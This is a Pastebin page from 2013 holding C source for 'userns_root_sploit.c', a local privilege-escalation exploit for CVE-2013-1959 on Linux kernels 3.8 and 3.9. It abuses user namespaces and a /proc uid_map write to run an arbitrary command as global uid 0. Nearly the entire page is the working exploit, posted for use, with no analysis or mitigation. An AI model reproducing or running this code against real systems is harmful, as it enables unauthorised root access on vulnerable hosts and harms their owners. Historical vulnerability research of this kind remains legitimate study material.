daily pastebin goal
79%
SHARE
TWEET

CVE-2013-1959 exploit Kernel 3.8 & 3.9

x64_ Apr 29th, 2013 471 Never
Upgrade to PRO!
ENDING IN00days00hours00mins00secs
 
  1. /* userns_root_sploit.c by */
  2. /* Copyright (c) 2013 Andrew Lutomirski.  All rights reserved. */
  3. /* You may use, modify, and redistribute this code under the GPLv2. */
  4.  
  5. #define _GNU_SOURCE
  6. #include <unistd.h>
  7. #include <sched.h>
  8. #include <sys/types.h>
  9. #include <sys/wait.h>
  10. #include <sys/mman.h>
  11. #include <fcntl.h>
  12. #include <stdio.h>
  13. #include <string.h>
  14. #include <err.h>
  15. #include <linux/futex.h>
  16. #include <errno.h>
  17. #include <unistd.h>
  18. #include <sys/syscall.h>
  19.  
  20. #ifndef CLONE_NEWUSER
  21. #define CLONE_NEWUSER 0x10000000
  22. #endif
  23.  
  24. pid_t parent;
  25. int *ftx;
  26.  
  27. int childfn()
  28. {
  29.   int fd;
  30.   char buf[128];
  31.  
  32.   if (syscall(SYS_futex, ftx, FUTEX_WAIT, 0, 0, 0, 0) == -1 &&
  33.       errno != EWOULDBLOCK)
  34.     err(1, "futex");
  35.  
  36.   sprintf(buf, "/proc/%ld/uid_map", (long)parent);
  37.   fd = open(buf, O_RDWR | O_CLOEXEC);
  38.   if (fd == -1)
  39.     err(1, "open %s", buf);
  40.   if (dup2(fd, 1) != 1)
  41.     err(1, "dup2");
  42.  
  43.   // Write something like "0 0 1" to stdout with elevated capabilities.
  44.   execl("./zerozeroone", "./zerozeroone");
  45.  
  46.   return 0;
  47. }
  48.  
  49. int main(int argc, char **argv)
  50. {
  51.   int dummy, status;
  52.   pid_t child;
  53.  
  54.   if (argc < 2) {
  55.     printf("usage: userns_root_sploit COMMAND ARGS...\n\n"
  56.            "This will run a command as (global) uid 0 but no capabilities.\n");
  57.     return 1;
  58.   }
  59.  
  60.   ftx = mmap(0, sizeof(int), PROT_READ | PROT_WRITE,
  61.              MAP_SHARED | MAP_ANONYMOUS, -1, 0);
  62.   if (ftx == MAP_FAILED)
  63.     err(1, "mmap");
  64.  
  65.   parent = getpid();
  66.  
  67.   if (signal(SIGCHLD, SIG_DFL) != 0)
  68.     err(1, "signal");
  69.  
  70.   child = fork();
  71.   if (child == -1)
  72.     err(1, "fork");
  73.   if (child == 0)
  74.     return childfn();
  75.  
  76.   *ftx = 1;
  77.   if (syscall(SYS_futex, ftx, FUTEX_WAKE, 1, 0, 0, 0) != 0)
  78.     err(1, "futex");
  79.  
  80.   if (unshare(CLONE_NEWUSER) != 0)
  81.     err(1, "unshare(CLONE_NEWUSER)");
  82.  
  83.   if (wait(&status) != child)
  84.     err(1, "wait");
  85.   if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
  86.     errx(1, "child failed");
  87.  
  88.   if (setresuid(0, 0, 0) != 0)
  89.     err(1, "setresuid");
  90.   execvp(argv[1], argv+1);
  91.   err(1, argv[1]);
  92.  
  93.   return 0;
  94. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top